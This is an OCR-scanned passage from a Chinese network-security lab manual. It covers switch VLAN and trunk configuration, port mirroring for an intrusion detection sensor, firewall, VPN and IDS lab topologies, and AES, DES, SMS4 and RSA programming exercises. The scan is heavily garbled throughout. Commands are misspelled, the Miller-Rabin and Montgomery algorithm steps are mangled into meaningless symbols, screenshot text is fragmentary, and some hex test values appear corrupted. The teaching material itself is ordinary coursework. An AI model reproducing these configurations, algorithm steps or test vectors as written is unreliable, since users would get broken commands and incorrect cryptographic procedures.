2.2.2 VLAN 划分 


【实验 目的 】 
掌握 VLAN 的 基本 概念 ， 学 会 在 交换 机 上 划分 VLAN 的 操作 。 
【原理 简介 】 


VLAN (Virtual Local Area Network) 就 是 虚拟 局 域 网 的 简称 。VLAN 可 以 不 考虑 用 
户 的 物理 位 置 ， 而 根据 功能 、 应 用 等 因素 将 用 户 从 逻辑 上 划分 为 一 个 个 功能 相对 独立 的 
工作 组 ， 每 个 用 户主 机 都 连接 在 一 个 支持 VLAN 


的 交换 机 端口 上 并 属于 一 个 VLAN。 同 一 个 VLAN SwitchA 
中 的 成 员 都 共享 广播 ， 形 成 一 个 广播 域 ， 而 不 同 一 
VLAN 之 间 广 播 信息 是 相互 隔离 的 , 这样 做 主要 是 E0/3 E(/13 
为 了 减 小 广播 风暴 的 危害 。 E 
[ 实验 环境 】 HostA HostB HostC 
一 台 LS-3928TP-SI 型 交换 机 ，2~3 4 PC, 172.30.0.123 172.30.0.120 — 172.30.0.152 
网 络 连接 如 图 2-19 所 示 。 图 2-19 实验 拓扑 图 
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【实验 步骤 】 
(1) 按照 前 面 讲 过 的 交换 机 配置 方法 ， 根 据 图 2-19 设置 实验 PC 的 IP 地 址 。 
(2) 配置 交换 机 端口 3 一 9 属于 VLAN 2: 


[Quidway]vlan 2 // 创 建 并 进入 VLAN 2 配置 模式 
[Quidway -vlan2]port Ethernet 0/3 to ethernet0/9 
// 将 端口 3~9 加 入 VLAN 2 


这 样 配置 结束 后 ， 在 HostA 上 ping 172.30.0.120 255.255.0.0， 可 以 观察 到 有 数据 回 
£i. 同样 ， 在 HostB 上 ping 172.30.0.123 255.255.0.0， 也 可 以 观察 到 有 数据 回复 。 而 在 
HostC 上 分 别 ping 172.30.0.120 255.255.0.0 和 ping 172.30.0.123 255.255.0.0 时 , 都 没有 数 
据 回复 。 也 就 是 HostA 和 HostB 之 间 可 以 相互 通信 , 而 HostC 与 HostA, HostC 与 HostB 
之 间 不 能 相互 通信 。 

【实验 报告 | 

(1) 写 出 详细 的 配置 过 程 。 

(2) 将 HostB 和 HostC 配置 在 VLAN 3 中 ， 实 验 三 台 主 机 之 间 的 通信 状况 ， 并 做 详 
细 记 录 。 

【思考 题 】 

一 个 小 型 公司 的 局 域 网 内 共有 50 台 PC， 分 为 管理 部 (10 A PC) 、 研 发 部 〈20 台 
PC) 和 销售 部 〈20 APC) 三 个 部 门 。 请 规划 它们 相应 的 IP 地 址 ， 从 而 能 够 实现 各 部 门 
之 间 的 相互 隔离 。 如 果 用 VLAN 方式 ， 如 何 设置 交换 机 ? 

2.2.3” 跨 交换 机 VLAN 划分 


【实验 目的 】 
本 实验 的 主要 目的 是 掌握 VLAN 的 基本 配置 。 在 完成 VLAN 的 相关 配置 之 后 , 要 求 
能 够 达到 同一 VLAN 内 的 PC 可 以 互通 ， 而 不 同 VLAN 间 的 PC 不 能 互通 的 目的 。 


【原理 简介 】 

VLAN 可 以 跨越 不 同 的 交换 机 ， 使 在 同一 个 VLAN 的 PC 相互 通信 。 

【实验 环境 】 SwitchA B SwitchB 
g E E0/1 — 


两 台 S3000 系列 交换 机 ，4 & PC. 按照 
图 2-20 连接 各 实验 设备 , 然后 配置 HostA IP 
地 址 为 10.1.1.2/24 HostB IP 地 址 为 
10.1.2.2/24, HostC IP 地 址 为 10.1.1.3/24， 
HostD IP 地 址 为 10.1.2.3/24。 


E0/9 E0/17 


HostA HostB. HostC HostD 
【实验 步骤 】 VLAN2  VLAN3 VLAN2 VLAN3 
具体 的 配置 如 下 。 图 2-20 实验 拓扑 图 
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(1) 配置 交换 机 端口 属于 特定 VLAN。 


[Quidway]sysname SwitchA 
[SwitchA]vlan 2 


// 更 改 系统 名 
// 创 建 并 进入 VLAN 2 配置 模式 


[SwitchR -vlan2]port ethernet0/9 to ethernet0/16 


[SwitchA -vlan2]vlan 3 


// 将 端口 9~16 加 入 VLAN 2 
// 创 建 并 进入 VLAN 3 配置 模式 


[SwitchA -vlan3]port ethernet0/17 to ethernet0/24 


SwitchB 的 配置 与 上 面相 似 。 


[Quidway]sysname SwitchB 
[SwitchB]vlan 2 


// 将 端口 17 一 24 加 入 VLAN 3 


[SwitchB -vlan2]port ethernet0/9 to ethernet0/16 


[SwitchB-vlan2]vlan 3 


[SwitchB -vlan3]port ethernet0/17 to ethernet0/24 


(2) 配置 交换 机 之 间 的 端口 为 Trunk 端口 ， 并 且 人 允许 所 有 VLAN 通过 。 


[SwitchA]interface ethernet0/1 


// 进 入 端口 1 视图 


[SwitchA-Ethernet0/1] portlink-typetrunk 

// 设 置 端口 工作 在 Trunk 模式 (系统 默认 为 Access 模式 ) 
[SwitchR -Ethernet0/l]port trunk permit vlan all 

// 人 允许 所 有 VLAN 通过 Trunk 端口 


下 面 设置 类 同 : 


[SwitchB]interface ethernet 0/1 


// 进 入 端口 1 视图 


[SwitchB-Ethernet0/1]port link-type trunk // 设 置 端口 连接 类 型 
[SwitchB-Ethernet0/1]port trunk permit vlan all // 人 允许 所 有 VLAN 通过 


配置 完成 后 , 可 以 看 到 , 同一 VLAN 内 部 的 PC 可 以 互相 访问 , 不 同 VLAN 间 的 PC 


不 能 够 互相 访问 。 

Go 在 原 有 拓扑 结构 的 基础 上 , 添加 一 
台 交 换 机 Switche 如 图 2-21 所 示 。 要 求 达 
到 上 述 同样 的 目的 ， 相同 VLAN 间 可 以 通 
fais 不同 VLAN 间 不 能 通信 。 请 特别 注意 ， 

j 台 主机 要 想 ping 通 ， 必 须要 将 主机 的 IP 

地 址 设置 在 同一 个 网 段 中 , 否则 , 即使 在 相 
同 的 VLAN 中 而 主机 的 卫 地址 并 没有 配置 
在 同一 个 网 段 中 ， 那 么 主机 也 是 ping 不 
通 的 。 

(4) 继续 上 面 的 实验 ， 此 时 需要 修改 
SwitchC 交换 机 E0/1 和 E0/2 接口 的 配置 ， 
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SwitchC 


E0/1 E0/2 


SwitchA 


HostA HostB HostC HostD 
VLAN2 VLAN3 VLAN2 VLAN3 


图 2-21 实验 拓扑 图 
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配置 步 又 如 下 。 
配置 三 台 交 换 机 之 间 的 链 路 为 Trunk 链 路 : 


[Quidway]sysname SwitchC 


[SwitchC]interface ethernet0/1 // 进 入 端口 1 视图 
[SwitchC-Ethernet0/1]port link-type trunk // 设 置 端口 连接 类 型 
[SwitchC-Ethernet0/1]port trunk permit vlan all // 人 允许 所 有 VLAN 通过 
[SwitchC-Ethernet0/1]interface ethernet0/2 // 进 入 端口 2 视图 
[SwitchC-Ethernet0/2]port link-type trunk // 设 置 端口 连接 类 型 


[SwitchC-Ethernet0/2]port trunk permit vlan all // 人 允许 所 有 VIAN 通过 


完成 上 述 配置 之 后 , 可 以 测试 一 下 各 VLAN 之 间 的 主机 是 否 可 以 ping 通 。 结 果 是 否 
定 的 ， 这 是 因为 在 交换 机 SwitchC 没有 配置 VLAN 2 和 VLAN 3， 所 以 来 自 VLAN 2 和 
VLAN 3 的 帧 不 能 通过 。 必 须 在 交换 机 上 创建 VLAN 2 和 VLAN 3, 这 样 , 这 两 个 VLAN 
的 帧 才能 够 通过 SwitchC 。 

(5) 在 SwitchC 上 创建 VLAN2 il VLAN 3。 


[SwitchC]vlan 2 
[SwitchC]vlan 3 


这 样 就 基本 完成 了 实验 。 理 解 比较 透彻 的 读者 ， 可 以 自行 设计 VLAN 并 观察 结果 。 


【实验 报告 】 
(1) 写 出 配置 过 程 。 
(2) 使 用 display 命令 ， 观 察 VLAN 的 分 配 情况 。 


【思考 题 】 
(1) 用 流程 图 描述 出 你 所 理解 的 三 层 交 换 技术 的 软件 实现 ， 并 与 老师 交流 。 
(2) 在 局 域 网 中 ， 你 是 如 何 识别 VLAN 的 ? 通常 划分 VLAN 有 哪儿 种 方法 ? 


2.24 ”端口 镜像 配置 


【实验 目的 】 

本 实验 的 主要 目的 是 掌握 交换 机 端口 的 镜像 配置 。 在 完成 镜像 配置 后 ， 镜 像 端口 能 
够 捕获 所 有 通过 该 交换 机 的 数据 包 。 这 种 镜像 端口 的 配置 方法 非常 有 用 ， 例 如 ， 当 内 部 
网 络 欲 采用 基于 网 络 的 入 侵 检 测 系统 NIDS) 监听 所 有 进出 内 部 网 络 的 数据 流 时 ， 应 当 
将 交换 机 的 所 有 端口 镜像 到 NIDS 的 探测 器 端口 上 。 


【原理 简介 】 

交换 机 (Switch) 是 一 种 基于 MAC【〔 网 卡 的 硬件 地 址 〉 识 别 ， 能 完成 封装 转发 数据 包 
功能 的 网 络 设备 。 交 换 机 可 以 “学 习 ”MAC 地 址 ， 并 把 其 存放 在 内 部 地 址 表 中 ， 通 过 在 
数据 帧 的 始 发 者 和 目标 接收 者 之 间 建 立 临 时 的 交换 路 径 ， 使 数据 帧 直接 由 源 地 址 到 达 目 
的 地 址 。 

集线器 (Hub) 是 计算 机 网 络 中 连接 多 个 计算 机 或 其 他 设备 的 连接 设备 ， 是 对 网 络 
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进行 集中 管理 的 最 小 单元 。Hub 是 一 个 共享 设备 ， 主 要 提供 信号 放大 和 中 转 的 功能 ， 它 
把 一 个 端口 接收 的 所 有 信和 号 向 所 有 端口 分 发 出 去 。 一 些 集线器 在 分 发 之 前 将 弱 信 号 加 强 
后 重新 发 出 ， 还 有 一 些 集线器 则 排列 信号 的 时 序 以 提供 所 有 端口 间 的 同步 数据 通信 。 

Switch 和 Hub 是 有 区 别 的 ， 比 如 一 个 100Mb/s 的 Switch， 对 每 一 个 连接 在 Switch 
上 的 计算 机 的 速度 都 是 100Mb/s, ifii Hub 是 瓜分 100Mb/s 的 资源 。 而 且 Hub 是 通过 广播 
来 通信 ， 占 用 很 多 网 络 资源 。 

对 于 NIDS 而 言 ， 需 要 获取 整个 网 络 的 数据 ， 而 根据 前 面 阐述 的 交换 机 的 特点 ， 将 
NIDS 直接 揪 在 交换 机 的 某 个 端口 上 是 获取 不 到 整个 网 络 数据 的 ， 所 以 必须 通过 设置 交 
换 机 的 镜像 端口 , 使 所 有 端口 的 数据 在 发 送 到 目的 端口 的 同时 , 复制 一 份 送 给 镜像 端口 。 

【实验 环境 】 

一 台 华为 S2026 交换 机 ， 一 台 入 侵 检测 设备 ， 若 干 连接 到 交换 机 上 的 PC， 实 验 网 络 
拓扑 如 图 2-22 所 示 。 


【实验 步骤 】 
华为 S2008/S2016/S2026/S2403H/S3026 等 交 

换 机 都 支持 基于 端口 的 镜像 ， 有 以 下 两 种 方法 。 iil 
方法 一 : E0/0-E0122 


CD 配置 镜像 (观测 ) 端口 。 


[SwitchA]monitor-port e0/23 
// 将 端口 23 设 为 镜像 口 


(2) 配置 被 镜像 端口 。 


图 2-22 实验 拓扑 图 


[SwitchA]port mirror ethernet0/1 to Ethernet0/22 
// 将 端口 1 一 22 作为 镜像 数据 来 源 


方法 二 : 可 以 一 次 性 定义 镜像 和 被 镜像 端口 


[SwitchA] port mirror ethernet0/1 to ethernet0/22 observing-port ethernet0/23 
// 将 1 一 22 端口 数据 镜像 到 23 端口 


【实验 报告 】 
请 观察 并 比较 端口 被 镜像 前 后 , 插 在 该 端口 上 的 NIDS 所 获取 的 网 络 数据 有 何 变化 。 
【思考 题 】 


如 果 分 别 使 用 交换 机 和 集线器 ， 对 于 局 域 网 内 的 数据 嗅 探 有 什么 影响 ? 
23 防火 墙 


硬件 防火 墙 实验 所 采用 的 网 络 结构 如 图 2-23 所 示 。 
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区。 防火墙 
192.168.3.1 


图 2-23 硬件 防火 墙 实验 所 采用 的 网 络 拓扑 结构 图 


24 VPN 


网 络 到 网 络 模式 VPN 实验 的 网 络 拓扑 结构 如 图 2-24 所 示 。 


219.224.161.147 219.224.161.146 219.224.161.145 
~ 


网 络 1:172.16.1.0/24 网 络 2:172.16.2.0/24 网 络 3:172.16.3.0/24 
224 ”网络 到 网 络 模式 VPN 实验 网 络 拓 扑 结构 图 
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_2.5 IDS 
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入 侵 检测 系统 IDS 实验 的 网 络 拓扑 结构 如 图 2-25 所 示 。 


IDS eth0:192.168.1.110 


eth1:192.168.1.111 
192.168.1.13 


192.168.1.0/24 
图 2-25 IDS 实验 网 络 拓扑 结构 图 


63x 
对 称 密 码 算 法 
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【实验 目的 】 
通过 对 AES 算法 的 C 源 程 序 代 码 进行 修改 ,了 解 和 掌握 分 组 密码 体制 的 运行 原理 和 
编程 思想 。 


【原理 简介 】 

AES 是 1997 年 1 月 由 美国 国家 标准 和 技术 研究 所 (NIST) 发 布 公告 征集 的 新 一 代 
数据 加 密 标 准 ， 以 替代 DES 加 密 算 法 。 其 为 对 称 分 组 密码 ， 分 组 长 度 为 128b， 密 钥 长 
度 支持 128b、192b、256b。 在 最 终 的 评估 中 ， 和 凭借 各 种 平台 实现 性 能 的 高 效 性 ，Vincent 
Rijnmen 和 Joan Daemen 提出 的 Rijndael 算法 胜出 , 最 终 被 国际 标准 化 组 织 确 定 为 新 一 代 
数据 加 密 标准 AES. 

有 关 算 法 的 详细 介绍 请 参阅 相关 参考 书 。 


【实验 环境 】 
安装 操作 系统 是 Windows, Linux 的 PC 一 台 ， 且 其 上 安装 有 一 种 C 语言 编译 环境 。 
【实验 步骤 】 


本 实验 使 用 的 是 Rijndael 的 作者 在 《高 级 加 密 标准 CAES) 算法 一 一 Rijndael 的 设计 》 
(中 文 版 已 由 清华 大 学 出 版 社 发 行 ) 附录 中 给 出 的 参考 代码 。 该 代码 演示 了 在 明文 和 密 钥 
均 为 全 0 时 ， 不 同 分 组 、 不 同 密 钥 长 度 下 进行 AES 加 解密 的 结果 。 本 实验 也 可 从 
https://github.com/libtom/libtomerypt/blob/master/sre/ciphers/aes/aes.c 下 载 AES 的 实现 源码 。 

请 读者 分 析 代 码 , 找 出 各 个 部 分 是 由 哪个 函数 实现 的 , 并 了 解 函数 实现 的 具体 过 程 。 

选取 密 钥 长 度 和 分 组 长 度 均 为 128b， 试 修改 上 述 代 码 ， 完 成 以 下 实验 。 

COD 全 0 密 钥 扩展 验证 : 对 于 128b 全 零 密 钥 ， 请 利用 KeyExpansion 函数 将 密 钥 扩 
展 的 结果 填 入 表 3-1 中 。 


表 3-1 各 轮 的 扩展 密 角 


第 0 轮 | 00000000000000000000000000000000 
第 1 轮 | 62636363626363636263636362636363 
第 2 轮 | 
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(2) 修改 程序 ， 在 表 3-2 中 填写 第 1 轮 、 第 2 轮 的 中 间 步 又 测试 向 量 。 


LEGEND 
Input: 
Start: 
S_box: 
S_row: 
M col: 
K sch: 


Output: 


-round r - 0 to 10 

cipher input 

state at the start of round[r] 

state after s box substitution 

state after shift row transformation 
state after mix column transformation 
key achedule value for round[r] 
cipher output 


PLAINTEXT: 3243F6A8885A308D313198A2E0370734 


KEY: 


2B7E151628AED2A6ABF7158809CF4F3C 


ENCRYPT: 16 byte block, 16 byte key 


R32 第 1 轮 、 第 2 轮 的 中 间 步 骤 测 试 向 量 


R[00].input 3243F6A8885A308D3 13 198A2E0370734 
R[00].k sch 2B7E151628AED2A6ABF7158809CF4F3C 
R[01 J.start 193DE3BEA0F4E22B9AC68D2AE9F84808 
R[01].s box 

R[01].s row 

R[01].m col 

R[01].k sch 

R[02].start 


C— LT EE ELE 
R[02].s box 


R[02].s row 


一 一 一 一 一 一 


R[02].m_col 
R[02].k_sch 


G) 修改 该 程序 ， 使 其 可 在 (128, 128) 模式 下 进行 文件 的 加 解密 ， 并 对 某 文档 进 
行 加 解密 ， 观 察 解密 后 与 原文 是 否 相 同 。 如 有 不 同 ， 试 考虑 如 何 解 决 。 再 用 该 程序 加 密 


流 媒体 文件 ， 


观察 解密 后 是 否 能 够 正确 完整 播放 。 


(4) 计算 加 解密 的 效率 ， 并 进行 一 定 的 优化 使 加 密 效 率 提高 。 
【实验 报告 】 

(1) 简 述 AES 算法 每 个 输入 分 组 的 长 度 及 格式 。 

(2) 简 述 AES 算法 每 轮 加 密 过 程 的 4 个 步骤 。 

(3) 填写 上 面 的 表格 。 

【思考 题 】 

计算 加 解密 的 效率 ， 并 进行 一 定 的 优化 使 加 密 效 率 提高 。 
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【实验 目的 】 
通过 对 DES 算法 的 代码 编写 , 了 解 分 组 密码 算法 的 设计 思想 和 分 组 密码 算法 的 工作 
模式 。 


【原理 简介 】 

DES 是 Data Encryption Standard〈 数 据 加 密 标 准 ) 的 缩写 。 它 是 由 IBM 公司 研制 的 
一 种 加 密 算法 ， 美 国 国家 标准 局 于 1977 年 公布 把 它 作为 非 机 要 部 门 使 用 的 数据 加 密 标 
准 ， 三 十 多 年 来 ， 它 一 直 活 跃 在 国际 保密 通信 的 舞台 上 ， 扮 演 了 十 分 重要 的 角色 。DES 
是 一 个 分 组 加 密 算法 ， 分 组 长 度 为 64b， 密 钥 长 度 也 为 64b， 但 因为 含有 8 个 奇偶 校 验 比 
特 ， 所 以 实际 密 钥 长 度 为 56b。DES 算法 是 迄今 为 止 使 用 最 为 广泛 的 加 密 算 法 ， 由 于 计 
算 能 力 的 发 展 , DES 算法 的 密 钥 长 度 已 经 显得 不 够 安全 了 , 所 以 目前 DES 的 常见 应 用 方 
式 是 DES_ EDE2， 即 三 重 DES， 采 用 加 密 一 解密 一 加 密 三 重 操作 完成 加 密 ， 其 中 加 密 操 
作 采 用 同一 密 铀 ， 解 密 操 作 采 用 另 一 密 铀 ， 有 效 密 钥 长 度 为 112b。 

有 关 算 法 的 详细 介绍 请 参阅 相关 参考 书 。 

【实验 环境 】 

安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC 6.0 以 上 版 本 的 编译 器 。 


【实验 步骤 】 

CIO 请 读者 从 http://cryptopp.sourceforge.net/docs/ref52 1/des_8cpp-source.html 下 载 
DES 实现 的 源 代码 ， 并 以 112b 全 0 密 钥 加 密 数 据 fE fF f£ fE fE AP AP AP, Doubs Re 
为 35 55 50 b2 15 0e 24 51. 

(2) 测试 加 密 速度 和 程序 代码 长 度 。 

(3) 使 用 CBC 方式 加 密 一 段 64B 自选 数据 ， 改 变 初始 向 量 值 ， 比 较 加 密 结果 。 

【实验 报告 】 

(1) DES_EDE2 算法 程序 实现 框图 、 使 用 说 明和 源 程序 清单 。 

(2) 算法 加 密 速 度 测试 结果 。 

(3) CBC 方式 加 密 运 行 结 果 ， 并 说 明 CBC 加 密 方式 的 特点 。 

【思考 题 】 

a) 从 加 密 速度 和 代码 长 度 比 较 DES_EDE2 和 AES 的 算法 效率 。 

(2) 为 什么 要 使 用 DES. EDE2 而 不 使 用 密 钥 不 同 的 两 重 DES? 
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33 SMS4 

【实验 目的 】 

通过 对 SMS4 算法 的 代码 编写 ， 了 解 分 组 密码 算法 的 设计 思想 和 工作 原理 。 
【原理 简介 了】 


SMS4 是 一 种 由 国家 商用 密码 管理 办 公 室 发 布 应 用 于 无 线 局 域 网 产品 中 的 加 密 算 
法 。 该 算法 是 一 个 分 组 算法 。 该 算法 的 分 组 长 度 为 128b， 密 钥 长 度 为 128b。 加 密 算法 与 
密 钥 扩展 算法 都 采用 32 轮 非 线性 迭代 结构 。 解 密 算 法 与 加 密 算法 的 结构 相同 ， 只 是 轮 密 
钥 的 使 用 顺序 相反 ， 解 密 轮 密 钥 是 加 密 轮 密 钥 的 逆序 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC 6.0 以 上 版 本 的 编译 器 。 


【实验 步骤 】 

(1) 从 http://read.pudn.com/downloads76/sourcecode/crypt/287055/sms4/sms4.cpp_. 
htm 参考 编写 SMS4 算法 ， 并 以 密 钥 : 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 加 密 
数据 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10, 验证 加 密 结果 是 否 为 68 le df 34 d2 06 
96 5e 86 b3 e9 4f 53 6e 42 46. 

(2) 利用 相同 加 密 密 钥 对 一 组 明文 反复 加 密 1 000 000 次 ， 密 钥 为 : 01 23 45 67 89 ab 
cd ef fe de ba 98 76 54 32 10， 加 密 数 据 为 01 23 45 67 89 ab cd ef fe de ba 98 76 54 32 10, 
验证 测试 结果 是 否 为 59 52 98 c7 c6 fd 27 1f 04 02 f8 04 c3 3d 3f 66. 

Go 计算 加 解密 的 效率 ， 并 进行 一 定 的 优化 使 加 密 效率 提高 。 

【实验 报告 】 

(1) 简 述 SMS4 加 密 算法 密 钥 生成 的 步骤 及 加 解密 过 程 。 

(2) SMS4 加 密 算法 实现 框图 和 源 程序 清单 。 


【思考 题 】 

(1) 分 析 SMS4 在 密码 结构 上 与 DES、AES 有 何 异 同 。 

(2) 根据 SMS4 算法 ， 编 程 研究 SMS4 的 S 盒 的 以 下 特性 。 

@ 明文 输入 改变 一 位 ， 密 文 输出 平均 改变 多 少 位 ? 

Q s 盒 输入 改变 一 位 ，S 盒 输出 平均 改变 多 少 位 ? 

© 工 输入 改变 一 位 ，L 输出 平均 改变 多 少 位 ? 

@ 对 于 一 个 输入 ， 连 续 施 加 S 盒 变 换 ， 变 换 多 少 次 时 出 现 输出 等 于 输入 ? 
(3) 我 国 公布 商用 密码 算法 有 何 意义 ? 
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【实验 目的 】 
掌握 RSA 算法 的 基本 原理 及 素数 判定 中 的 Rabin-Miller 测试 原理 、Montgomery 快 
速 模 乘 算法 ， 了 解 公 钥 加 密 体 制 的 优 缺 点 及 其 应 用 方式 。 


【原理 简介 】 

1978 年 发 明 的 RSA 算法 是 第 一 个 既 能 用 于 数据 加 密 也 能 用 于 数字 签名 的 算法 。 它 
易于 理解 和 操作 , 是 最 为 流行 的 公 钥 加 密 算法 之 一 。 算 法 以 发 明 者 的 名 字 命 名 : R.Rivest、 
A.Shamir #il L.Adleman. RSA 算法 是 基于 大 数 分 解 这 个 数论 难题 的 基础 上 的 ， 目 前 尚未 
证 明 破解 RSA 体制 等 价 于 大 数 因 式 分 解 ， 也 许 人 们 日 后 可 以 找到 其 他 破解 方法 从 而 使 
RSA 算法 失效 。 RSA 算法 的 另 一 缺陷 是 其 运算 速度 要 远 慢 于 对 称 密码 体制 ,这 大 大 限制 
了 它 的 使 用 范围 。RSA 很 少 直接 用 于 加 密 海 量 数据 或 是 通信 信息 ， 而 是 将 其 用 在 数字 签 
名 、 密 钥 分 配 和 数字 信封 等 领域 。RSA 算法 的 关键 运算 是 大 数 的 模 指 数 运 算 ， 最 常用 的 
实现 方法 是 采用 Montgomery 模 乘 算法 来 实现 模 指 数 运 算 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC 6.0 以 上 版 本 的 编译 器 。 


【实验 步骤 】 

1. RSA 算法 实现 

读者 可 从 http://cryptopp.sourceforge.net/docs/ref521/rsa_8cpp-source.html 得 到 一 个 
C++ 的 RSA 源 程序 ， 该 源 程序 已 经 包含 较 多 的 注释 ,希望 读者 能 够 借助 这 些 注释 读 懂 这 
个 程序 。 在 读 程序 的 过 程 中 ， 要 对 Rabin-Miller 素性 检验 和 Montgomery 模 乘 有 一 个 明确 
的 了 解 。 

1) Miller-Rabin 检测 法 

Miller-Rabin 检测 法 基于 Gary Miller 的 部 分 想法 ， 由 Michael Rabin 发 展 。 该 检测 法 
描述 如 下 : 首先 选择 一 个 待 测 的 随机 数 n， 计 算 bp，2 是 能 够 整除 n-1 的 2 的 最 大 寡 数 。 
然后 计算 m， 使 得 n=2sm+l。 

QD 随机 选取 aE(1，n)。 

© ix j-0, iH z=a"mod n. 

© E zl RH znl, Wn HWA, REE SCA. 


mm 网 络 安全 实验 教程 (第 2 版 ) mm 


© 如 果 j>0 Hl, Wn PERM 
© 4 je. 车 j<b Hz#n-1, &2=2modn, KAAMAOL. 
若 z=n-1, W na 通过 测试 ， 可 能 是 素数 。 
© 35 j-b HzAn-1, Wn KERR. 
对 a 选取 个 不 同 的 随机 值 ， 重 复 次 这 样 测试 。 如 果 n 都 能 通过 测试 ， 则 可 断定 
n 不 是 素数 的 概率 不 超过 4。 
2) Montgomery 算法 描述 
选择 与 n 互 素 的 基数 R 为 计算 方便 ， 它 通常 是 机 器 字 长 的 倍数 ， 并 且 选 择 RR 
n', WAL 0<R-'<n，0<n'<R， 使 得 RR -nn'-1. XE 0 三 T<RXn 的 任意 整数 7T，Montgomery 
给 出 求 取 模 乘 法 TR! mod n 的 快速 算法 MT): 
Function M(T) 
A=(T mod R) n'mod R; OXAXR 
t=(T+An)/R 
if tZn then return (t-n) 


liri 


else return t 


从 上 面 的 MD 运算 可 以 看 出 , 因为 Ans Tnn'—-T mod R, 故 t 为 整数 ; 因 RT mod 
n, f t TR mod n. HF 0 入 THz<Rn+R2，MD) 的 运算 结果 范围 是 O<1<2n. 
由 于 整数 以 R 的 剩余 系 形式 参加 计算 ， 所 以 Montgomery 算法 会 带 来 一 定 的 附加 计 
算 。 在 计算 z-ab mod n( 其 中 a, b<R) 之 前 ， 预 先 求 出 4=aR mod n 和 B=bR mod n， 青 求 
Z-M(A, B)=ABR" mod n=(aR)(bR)R mod n=(abR) mod n， 最 后 的 计算 结果 也 要 做 相应 调 
3t z- M(Z)-Z R^! mod n=abRR™ mod n=ab mod n。 可 见 这 种 方法 适合 于 像 RSA 这 样 有 多 
次 取 模 乘法 的 取 模 寡 乘 运算 。 对 于 整数 e 和 任意 整数 m， 加 密 或 解密 信息 m 即 是 求解 
me mod n。 对 输入 变换 得 到 M=mR mod n 之 后 , 取 模 守 乘 的 乘法 平方 循环 用 Montgomery 
乘法 来 完成 ， 最 后 调整 得 到 最 终 的 加 密 或 解密 信息 。 把 e 描述 成 e=exw-1enm-2…eieo， 其 
中 Ko) 表示 e 的 位 数 。 取 模 肾 乘 运算 过 程 可 描述 为 : 
M:=mR mod n; 
Z:-—1R mod n; 
for i in l(n)-1 downto 0 loop 
Z:-—Mn(Z, Z); 
if ei-1 then 
Z:-—Mn(Z, M); 
end if; 
end loop; 
z-Z R* mod n; 


2. 混合 加 密实 验 

借助 于 第 二 个 源 程序 ， 可 以 进行 一 次 采用 DES 算法 和 RSA 算法 的 混合 加 密 应 用 的 
实验 。 请 准备 一 个 较 大 的 影音 文件 用 于 加 解密 测试 〈 几 十 兆 字 节 、 几 百 兆 字 节 为 佳 ) 。 

程序 界面 如 图 4-1 所 示 。 
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BRE) REE SEV) HAM TRO) 组 建 (B) TAT) 窗口 (W) 帮助 (H) 
$c & 


[(Globats] 


= Ci Source Files 
E 3way.cpp 
[E adhoc.cpp.prot 
(3) adler32.cpp 
(3) algebra.cpp 
3) algparam.cpp 
E arc4.cpp 
因 asn.cpp. 
(3) authenc.cpp 
E base32.cpp 
(3) base64.cpp 


3i hasernde enn " 


"SCI... J$jRe... 


7 |[[All global member: ~] 


include "r: 

ttinclude * 

include “oi 
include “ 

include “1 

Winclude “: 

#include “algparan.h" 
include “Fips149.h" 


Tif tdeFined(NDEBUG) && fdefined(CRVPTOPP IS DLL) 
include "pssr.h" 
NAMESPACE_BEGIN(CryptoPP) 
void RSA_TestInstantiations() 
Hi 
RSASSXPKCS1u15, SHR»::Uerifier x1(1, 
RSASS<PKCS1U15, SHAD: :Signer x2(RuliRhGC , 


Conf 


iguration: cryptdll - Win32 Debug 


cryptopp.dll - 6 error(s), 8 warning(s) 


Eae Bi 


run the FIPS 14 


cryptest ft 


cryptest f 


generat 


crypt 


run Maurer 


cryptest mt 


run a te r 


run 


display version number 
cryptest U 


crypt tu 


validation 
crypt v 


在 文件 1 中 要 找 Y SEXTECBEHE ) BE SQL Debugging 


fT 5, 7] 17. 


图 4-1 加 密 测试 程序 界面 


MTZ C++ 程序 后 ， 可 以 进入 文件 加 密 程 序 界面 ， 如 图 4-2 所 示 。 


-o| x| 


source-port destination-host destination-b 四 


40-2 sample application 
ps 


s using FIPS Appro 
domness t on a file 
input 


ipt “available in TestUectors subdirectory) 
filenane 


t 


ye 
图 4.3 所 示 。 


所 以 单 击 【 产 


图 4-2 文件 加 有 


旦 序 界面 


: RSA 密 钥 对 】 按 钮 进入 产生 密 钥 对 界面 ， 如 


在 这 个 界面 下 可 以 产生 100 位 的 大 素数 P、O (产生 方法 依然 是 Rabin-Miller 检验 ) ， 
NN 值 ， 公 和 钥 e 和 私 钥 4。 注 意 ， 
之 后 ， 关 闭 这 个 界面 ， 在 加 密 界 面 中 选择 需要 加 密 的 文件 、RSA 的 参数 、 对 称 加 密 


Eng 


真 入 实验 报告 中 。 


开始 加 密 


导出 这 些 值 为 文件 ， 便 于 加 密 时 调用 。 


运算 , 注意 加 密 完成 后 的 加 密 时 间 、 加 密 后 的 文件 大 小 ， 
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ZryptoPP::Exception caught: FileSink: error opening file fo: 


[D: \eeSof tuares wor 
Key length in b 


ce US2888\crypto\CIDebug>cryptest g 
188 


Save private key to file: 
IN 


Save public key to file: C:* 
[Random Seed: 18 
CryptoPP::Exception ca 


eSink: error opening file fo: 


D: NeeSof twa 
Key length in b 


2008\crypto\CIDebug>cryptest g 


Save private key to fi vate-key.txt 


Save public key to file: C:Npublic-key.txt 


Random Seed: 18 


D: \eeSof twares workspace NUS2808 \crypto NCTDe bug? 


r writing: c: 


r writing: C:N 


图 4-3 产生 密 钥 对 界面 


将 加 密 好 的 文件 放 入 输入 文件 中 ， 将 密 钥 改 成 私 钥 就 
录 解 密 的 时 间 和 文件 大 小 。 特 别 注意 : 解密 后 的 文件 
【实验 报告 】 
(1) 简 述 RSA 算法 密 钥 生成 的 步骤 及 加 解密 过 程 。 
量 对 RSA 加 密 速 度 的 影响 。 


E RES 
ef 


(2) 简 述 加 密 


【思考 题 】 
(1) 对 称 
(2) 这 些 { 


ECC 


aR 
iH 


码 体制 与 非 对 称 密码 体制 各 有 什么 优 缺 点 ? 
缺点 是 如 何 影 响 它 们 的 应 用 的 ? 


4.2 


【实验 目的 】 


"fit libecc 开发 包 提供 的 各 个 库 函 数 的 用 法 ， 并 利用 这 


以 进行 公 钥 解密 了 。 同 样 记 


E 够 正常 播放 ? 


些 库 函 数 实现 基于 椭圆 曲线 


